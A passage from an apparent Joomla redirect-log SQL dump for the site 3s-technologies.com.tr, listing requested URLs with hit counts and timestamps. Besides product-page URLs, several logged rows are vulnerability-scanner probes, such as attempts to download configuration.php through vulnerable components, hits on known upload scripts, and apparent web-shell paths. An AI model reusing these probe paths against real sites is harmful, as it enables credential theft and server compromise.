00:00:00',301),(18946,'http://3s-technologies.com.tr/tr/media/system/js/,c.html);c.tree=b.childnodes;c.elements=b.getelements(a.filter||',NULL,'','',1,0,'2018-03-11 09:50:33','0000-00-00 00:00:00',301),(18947,'http://3s-technologies.com.tr/tr/media/system/js/,i);b.head=b.html=b.window=null};this.attachevent(',NULL,'','',1,0,'2018-03-11 09:50:33','0000-00-00 00:00:00',301),(18948,'http://3s-technologies.com.tr/tr/media/system/js/],function(a){f[a.tolowercase()]=a});f.html=',NULL,'','',1,0,'2018-03-11 09:50:35','0000-00-00 00:00:00',301),(18949,'http://3s-technologies.com.tr/tr/media/jui/js/)}else{this.container.html(',NULL,'','',1,0,'2018-03-11 09:50:41','0000-00-00 00:00:00',301),(18950,'http://3s-technologies.com.tr/tr/media/jui/js/,container_props);if(this.is_multiple){this.container.html(',NULL,'','',1,0,'2018-03-11 09:50:42','0000-00-00 00:00:00',301),(18951,'http://3s-technologies.com.tr/tr/media/jui/js/}).html(',NULL,'','',1,0,'2018-03-11 09:50:42','0000-00-00 00:00:00',301),(18952,'http://3s-technologies.com.tr/tr/ana-sayfa/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:54','0000-00-00 00:00:00',301),(18953,'http://3s-technologies.com.tr/tr/dalga-lehimleme/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:54','0000-00-00 00:00:00',301),(18954,'http://3s-technologies.com.tr/tr/hakkımızda/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:54','0000-00-00 00:00:00',301),(18955,'http://3s-technologies.com.tr/tr/iletisim/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:56','0000-00-00 00:00:00',301),(18956,'http://3s-technologies.com.tr/tr/kart-ueretim-teknolojileri/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:56','0000-00-00 00:00:00',301),(18957,'http://3s-technologies.com.tr/tr/kursunsuz-lehim/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:56','0000-00-00 00:00:00',301),(18958,'http://3s-technologies.com.tr/en/about-us/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:57','0000-00-00 00:00:00',301),(18959,'http://3s-technologies.com.tr/en/contacts/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:58','0000-00-00 00:00:00',301),(18960,'http://3s-technologies.com.tr/en/home-en/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:58','0000-00-00 00:00:00',301),(18961,'http://3s-technologies.com.tr/en/lead-free-solder/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:59','0000-00-00 00:00:00',301),(18962,'http://3s-technologies.com.tr/en/pcb-productions-methods/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:59','0000-00-00 00:00:00',301),(18963,'http://3s-technologies.com.tr/en/wave-soldering/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:51:12','0000-00-00 00:00:00',301),(18964,'http://3s-technologies.com.tr/tr/media/jui/js/===c?(b.parentnode&&(b.outerhtml=a.outerhtml),l.html5clone&&a.innerhtml&&!n.trim(b.innerhtml)&&(b.innerhtml=a.innerhtml)):',NULL,'','',1,0,'2018-03-11 09:51:14','0000-00-00 00:00:00',301),(18965,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/).text(i.label).html()',NULL,'','',1,0,'2018-03-11 09:52:05','0000-00-00 00:00:00',301),(18966,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/)}else{l.html(',NULL,'','',1,0,'2018-03-11 09:52:05','0000-00-00 00:00:00',301),(18967,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/}).html(this.select_all_text_default);this.dropdown.append(i);this.select_all_link=this.dropdown.find(',NULL,'','',1,0,'2018-03-11 09:52:09','0000-00-00 00:00:00',301),(18968,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/});if(this.is_multiple){l.html(',NULL,'','',1,0,'2018-03-11 09:52:10','0000-00-00 00:00:00',301),(18969,'http://3s-technologies.com.tr/tr/modules/mod_virtuemart_cart/assets/js/).html(',NULL,'','',1,0,'2018-03-11 09:52:11','0000-00-00 00:00:00',301),(18970,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/).html(',NULL,'','',1,0,'2018-03-11 09:52:52','0000-00-00 00:00:00',301),(18971,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/dirdesc/results,1-5',NULL,'','',1,0,'2018-03-11 11:42:14','0000-00-00 00:00:00',301),(18972,'http://3s-technologies.com.tr/tr/wp-content/plugins/premium_gallery_manager/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css','',1,0,'2018-03-11 11:50:09','0000-00-00 00:00:00',301),(18973,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-10',NULL,'','',1,0,'2018-03-11 13:14:48','0000-00-00 00:00:00',301),(18974,'http://3s-technologies.com.tr/en/wp-content/plugins/premium_gallery_manager/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css','',1,0,'2018-03-11 14:25:43','0000-00-00 00:00:00',301),(18975,'http://3s-technologies.com.tr/tr/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',43,0,'2018-03-11 15:18:13','0000-00-00 00:00:00',301),(18976,'http://www.3s-technologies.com.tr/tr/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=configuration.php',NULL,'','',2,0,'2018-03-11 21:49:52','0000-00-00 00:00:00',301),(18977,'http://www.3s-technologies.com.tr/tr/joomla/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=configuration.php',NULL,'','',2,0,'2018-03-11 21:49:52','0000-00-00 00:00:00',301),(18978,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css','',3,0,'2018-03-12 01:57:51','0000-00-00 00:00:00',301),(18979,'http://3s-technologies.com.tr/tr/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://www.google.com/','',22,0,'2018-03-12 03:36:20','0000-00-00 00:00:00',301),(18980,'http://3s-technologies.com.tr/en/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','',12,0,'2018-03-12 06:20:36','0000-00-00 00:00:00',301),(18981,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&itemid=146&lang=tr',NULL,'','',11,0,'2018-03-12 06:21:24','0000-00-00 00:00:00',301),(18982,'http://3s-technologies.com.tr/tr/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',2,0,'2018-03-12 11:35:24','0000-00-00 00:00:00',301),(18983,'http://3s-technologies.com.tr/tr/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','',4,0,'2018-03-12 12:41:09','0000-00-00 00:00:00',301),(18984,'http://3s-technologies.com.tr/en/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',2,0,'2018-03-12 14:39:43','0000-00-00 00:00:00',301),(18985,'http://3s-technologies.com.tr/en/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','',2,0,'2018-03-12 15:44:00','0000-00-00 00:00:00',301),(18986,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/kursunsuzuretimweb.pdf',NULL,'','',29,0,'2018-03-12 17:46:16','0000-00-00 00:00:00',301),(18987,'http://www.3s-technologies.com.tr/tr/blog/wp-login.php',NULL,'','',27,0,'2018-03-12 20:48:20','0000-00-00 00:00:00',301),(18988,'http://www.3s-technologies.com.tr/tr/wordpress/wp-login.php',NULL,'','',27,0,'2018-03-12 20:48:20','0000-00-00 00:00:00',301),(18989,'http://www.3s-technologies.com.tr/tr/wp/wp-login.php',NULL,'','',26,0,'2018-03-12 20:48:21','0000-00-00 00:00:00',301),(18990,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/screen-printer/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-03-13 03:16:50','0000-00-00 00:00:00',301),(18991,'http://3s-technologies.com.tr/tr/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','',1,0,'2018-03-13 03:51:53','0000-00-00 00:00:00',301),(18992,'http://3s-technologies.com.tr/en/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','',1,0,'2018-03-13 07:00:23','0000-00-00 00:00:00',301),(18993,'http://3s-technologies.com.tr/tr/wp-content/themes/ghost/includes/uploadify/upload_settings_image.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','',2,0,'2018-03-13 12:02:48','0000-00-00 00:00:00',301),(18994,'http://3s-technologies.com.tr/en/wp-content/themes/ghost/includes/uploadify/upload_settings_image.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','',3,0,'2018-03-13 15:41:05','0000-00-00 00:00:00',301),(18995,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-50',NULL,'','',5,0,'2018-03-13 16:38:26','0000-00-00 00:00:00',301),(18996,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-10',NULL,'','',4,0,'2018-03-13 19:25:58','0000-00-00 00:00:00',301),(18997,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/css/b2jcontact.css',NULL,'','',10,0,'2018-03-13 19:58:18','0000-00-00 00:00:00',301),(18998,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku',NULL,'','',5,0,'2018-03-13 21:45:18','0000-00-00 00:00:00',301),(18999,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/results,1-20',NULL,'','',2,0,'2018-03-13 21:56:55','0000-00-00 00:00:00',301),(19000,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc',NULL,'','',3,0,'2018-03-13 23:29:49','0000-00-00 00:00:00',301),(19001,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-03-13 23:41:26','0000-00-00 00:00:00',301),(19002,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',2,0,'2018-03-14 01:02:43','0000-00-00 00:00:00',301),(19003,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/js/fileuploader.js',NULL,'','',2,0,'2018-03-14 01:04:03','0000-00-00 00:00:00',301),(19004,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc',NULL,'','',3,0,'2018-03-14 01:37:33','0000-00-00 00:00:00',301),(19005,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',1,0,'2018-03-14 02:12:23','0000-00-00 00:00:00',301),(19006,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-20',NULL,'','',3,0,'2018-03-14 03:10:27','0000-00-00 00:00:00',301),(19007,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',7,0,'2018-03-14 04:31:44','0000-00-00 00:00:00',301),(19008,'https://www.3s-technologies.com.tr/index.php/en/products/npm-detail?print=1&tmpl=component',NULL,'','',1,0,'2018-03-14 04:59:54','0000-00-00 00:00:00',301),(19009,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-5',NULL,'','',6,0,'2018-03-14 06:39:28','0000-00-00 00:00:00',301),(19010,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/index.php',NULL,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/index.php','',20,0,'2018-03-14 07:02:51','0000-00-00 00:00:00',301),(19011,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-20',NULL,'','',5,0,'2018-03-14 08:23:59','0000-00-00 00:00:00',301),(19012,'http://3s-technologies.com.tr/en/components/com_sexycontactform/fileupload/index.php',NULL,'http://3s-technologies.com.tr/components/com_sexycontactform/fileupload/index.php','',11,0,'2018-03-14 10:27:13','0000-00-00 00:00:00',301),(19013,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-10',NULL,'','',1,0,'2018-03-14 10:41:07','0000-00-00 00:00:00',301),(19014,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-20',NULL,'','',7,0,'2018-03-14 11:58:16','0000-00-00 00:00:00',301),(19015,'http://3s-technologies.com.tr/tr/components/com_foxcontact/lib/',NULL,'http://3s-technologies.com.tr/tr/components/com_foxcontact/lib/','',1,0,'2018-03-14 12:42:54','0000-00-00 00:00:00',301),(19016,'http://3s-technologies.com.tr/tr/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css','',2,0,'2018-03-14 12:42:59','0000-00-00 00:00:00',301),(19017,'http://3s-technologies.com.tr/tr/modules/mod_bookmark/tmpl/default.php',NULL,'','',1,0,'2018-03-14 13:41:18','0000-00-00 00:00:00',301),(19018,'http://3s-technologies.com.tr/tr/language/en-gb/x991upx.php',NULL,'','',1,0,'2018-03-14 13:51:10','0000-00-00 00:00:00',301),(19019,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-50',NULL,'','',5,0,'2018-03-14 14:00:59','0000-00-00 00:00:00',301),(19020,'http://3s-technologies.com.tr/en/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css','',4,0,'2018-03-14 15:53:16','0000-00-00 00:00:00',301),(19021,'http://3s-technologies.com.tr/en/components/com_foxcontact/lib',NULL,'http://3s-technologies.com.tr/components/com_foxcontact/lib/','',1,0,'2018-03-14 15:53:17','0000-00-00 00:00:00',301),(19022,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-5',NULL,'','',1,0,'2018-03-14 16:49:40','0000-00-00 00:00:00',301),(19023,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',79,0,'2018-03-14 18:17:55','0000-00-00 00:00:00',301),(19024,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-10',NULL,'','',4,0,'2018-03-14 19:23:57','0000-00-00 00:00:00',301),(19025,'http://3s-technologies.com.tr/modules/mod_bookmark/helper.php',NULL,'','',1,0,'2018-03-14 22:48:12','0000-00-00 00:00:00',301),(19026,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/xaisyndicate/idx.php',NULL,'','',2,0,'2018-03-15 04:26:22','0000-00-00 00:00:00',301),(19027,'http://www.3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'http://www.3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/udd.php','',7,0,'2018-03-15 07:30:48','0000-00-00 00:00:00',301),(19028,'https://www.3s-technologies.com.tr/tr/urunler/jv131-detail?tmpl=component&print=1',NULL,'','',1,0,'2018-03-15 18:50:05','0000-00-00 00:00:00',301),(19029,'http://3s-technologies.com.tr/tr/images/stories/ketx.php.png',NULL,'','',3,0,'2018-03-15 19:26:31','0000-00-00 00:00:00',301),(19030,'http://www.3s-technologies.com.tr/en/joomla/administrator/index.php',NULL,'','',2,0,'2018-03-16 09:10:28','0000-00-00 00:00:00',301),(19031,'http://3s-technologies.com.tr/templates/system/html/index.phtml',NULL,'3s-technologies.com.tr','',2,0,'2018-03-16 11:08:42','0000-00-00 00:00:00',301),(19032,'http://3s-technologies.com.tr/administrator/thumbs_img.php',NULL,'3s-technologies.com.tr','',1,0,'2018-03-16 14:36:15','0000-00-00 00:00:00',301),(19033,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,product_sku/results,1-5',NULL,'','',4,0,'2018-03-16 20:28:15','0000-00-00 00:00:00',301),(19034,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-50',NULL,'','',5,0,'2018-03-16 21:11:16','0000-00-00 00:00:00',301),(19035,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-20',NULL,'','',7,0,'2018-03-16 23:33:23','0000-00-00 00:00:00',301),(19036,'http://www.3s-technologies.com.tr/tr/site/wp-login.php',NULL,'','',3,0,'2018-03-17 03:23:25','0000-00-00 00:00:00',301),(19037,'http://www.3s-technologies.com.tr/tr/portal/wp-login.php',NULL,'','',2,0,'2018-03-17 03:23:26','0000-00-00 00:00:00',301),(19038,'http://3s-technologies.com.tr/tr/assets/js/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/assets/js/uploadify/uploadify.css','',2,0,'2018-03-17 03:32:59','0000-00-00 00:00:00',301),(19039,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,product_name/results,1-20?language=en-gb',NULL,'','',7,0,'2018-03-17 03:40:14','0000-00-00 00:00:00',301),(19040,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc/results,1-5',NULL,'','',6,0,'2018-03-17 04:11:05','0000-00-00 00:00:00',301),(19041,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,`p`.product_sku/results,1-10?language=en-gb',NULL,'','',3,0,'2018-03-17 04:52:14','0000-00-00 00:00:00',301),(19042,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-03-17 05:23:05','0000-00-00 00:00:00',301),(19043,'http://3s-technologies.com.tr/en/assets/js/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/assets/js/uploadify/uploadify.css','',1,0,'2018-03-17 06:26:12','0000-00-00 00:00:00',301),(19044,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2018-03-17 06:45:22','0000-00-00 00:00:00',301),(19045,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-03-17 08:07:39','0000-00-00 00:00:00',301),(19046,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,`p`.product_sku',NULL,'','',4,0,'2018-03-17 08:38:32','0000-00-00 00:00:00',301),(19047,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-03-17 09:19:39','0000-00-00 00:00:00',301),(19048,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_sku/results,1-5',NULL,'','',3,0,'2018-03-17 10:20:30','0000-00-00 00:00:00',301),(19049,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-20',NULL,'','',5,0,'2018-03-17 11:20:30','0000-00-00 00:00:00',301),(19050,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_sku/results,1-10',NULL,'','',2,0,'2018-03-17 11:50:29','0000-00-00 00:00:00',301),(19051,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2018-03-17 14:05:30','0000-00-00 00:00:00',301),(19052,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_sku/results,1-20',NULL,'','',3,0,'2018-03-17 14:20:29','0000-00-00 00:00:00',301),(19053,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_name/results,1-5',NULL,'','',3,0,'2018-03-17 15:50:28','0000-00-00 00:00:00',301),(19054,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-10',NULL,'','',5,0,'2018-03-17 16:05:29','0000-00-00 00:00:00',301),(19055,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_sku/results,1-50',NULL,'','',3,0,'2018-03-17 17:15:30','0000-00-00 00:00:00',301),(19056,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2018-03-17 19:35:28','0000-00-00 00:00:00',301),(19057,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-5?language=en-gb',NULL,'','',5,0,'2018-03-17 20:50:28','0000-00-00 00:00:00',301),(19058,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_name/results,1-50',NULL,'','',3,0,'2018-03-17 21:05:27','0000-00-00 00:00:00',301),(19059,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-10?language=en-gb',NULL,'','',4,0,'2018-03-17 22:20:28','0000-00-00 00:00:00',301),(19060,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_name/results,1-20',NULL,'','',4,0,'2018-03-17 22:35:27','0000-00-00 00:00:00',301),(19061,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-50?language=en-gb',NULL,'','',3,0,'2018-03-17 23:50:27','0000-00-00 00:00:00',301),(19062,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-03-18 00:05:28','0000-00-00 00:00:00',301),(19063,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-20',NULL,'','',16,0,'2018-03-18 00:35:29','0000-00-00 00:00:00',301),(19064,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-10?language=en-gb',NULL,'','',4,0,'2018-03-18 00:50:27','0000-00-00 00:00:00',301),(19065,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2018-03-18 01:20:27','0000-00-00 00:00:00',301),(19066,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,`p`.product_sku/results,1-50',NULL,'','',9,0,'2018-03-18 02:35:27','0000-00-00 00:00:00',301),(19067,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-03-18 03:05:27','0000-00-00 00:00:00',301),(19068,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-20?language=en-gb',NULL,'','',3,0,'2018-03-18 03:35:27','0000-00-00 00:00:00',301),(19069,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,`p`.product_sku/results,1-10',NULL,'','',5,0,'2018-03-18 04:20:26','0000-00-00 00:00:00',301),(19070,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/results,1-5',NULL,'','',4,0,'2018-03-18 06:32:48','0000-00-00 00:00:00',301),(19071,'http://www.3s-technologies.com.tr/tr/xmlrpc.php',NULL,'http://www.google.com.hk','',27,0,'2018-03-18 13:32:23','0000-00-00 00:00:00',301),(19072,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/results,1-10',NULL,'','',1,0,'2018-03-18 18:22:34','0000-00-00 00:00:00',301),(19073,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-03-18 19:40:43','0000-00-00 00:00:00',301),(19074,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2018-03-18 20:02:03','0000-00-00 00:00:00',301),(19075,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2018-03-18 21:35:22','0000-00-00 00:00:00',301),(19076,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-5',NULL,'','',1,0,'2018-03-19 00:55:22','0000-00-00 00:00:00',301),(19077,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2018-03-19 01:32:02','0000-00-00 00:00:00',301),(19078,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-03-19 01:35:22','0000-00-00 00:00:00',301),(19079,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',1,0,'2018-03-19 02:02:02','0000-00-00 00:00:00',301),(19080,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-03-19 02:55:22','0000-00-00 00:00:00',301),(19081,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-10',NULL,'','',1,0,'2018-03-19 03:22:02','0000-00-00 00:00:00',301),(19082,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-20?language=en-gb',NULL,'','',4,0,'2018-03-19 04:02:01','0000-00-00 00:00:00',301),(19083,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-50',NULL,'','',2,0,'2018-03-19 04:42:01','0000-00-00 00:00:00',301),(19084,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-50?language=en-gb&filter_product=',NULL,'','',4,0,'2018-03-19 08:12:35','0000-00-00 00:00:00',301),(19085,'http://www.3s-technologies.com.tr/tr/joomla/index.php',NULL,'','',68,0,'2018-03-19 10:17:22','0000-00-00 00:00:00',301),(19086,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-50',NULL,'','',4,0,'2018-03-19 11:06:23','0000-00-00 00:00:00',301),(19087,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',3,0,'2018-03-19 14:24:59','0000-00-00 00:00:00',301),(19088,'http://3s-technologies.com.tr/libraries/joomla/cache/storage/memcaches.php',NULL,'3s-technologies.com.tr','',2,0,'2018-03-19 17:25:24','0000-00-00 00:00:00',301),(19089,'http://3s-technologies.com.tr/modules/mod_search/tmpl/defaults.php',NULL,'3s-technologies.com.tr','',2,0,'2018-03-19 17:25:44','0000-00-00 00:00:00',301),(19090,'http://3s-technologies.com.tr/tr/index.php?option=com_jwallpapers&task=upload',NULL,'http://3s-technologies.com.tr/tr/index.php?option=com_jwallpapers&task=upload','',1,0,'2018-03-20 04:49:30','0000-00-00 00:00:00',301),(19091,'https://3s-technologies.com.tr/libraries/joomla/cache/storage/memcaches.php',NULL,'3s-technologies.com.tr','',1,0,'2018-03-20 08:04:25','0000-00-00 00:00:00',301),(19092,'https://3s-technologies.com.tr/modules/mod_search/tmpl/defaults.php',NULL,'3s-technologies.com.tr','',1,0,'2018-03-20 08:05:15','0000-00-00 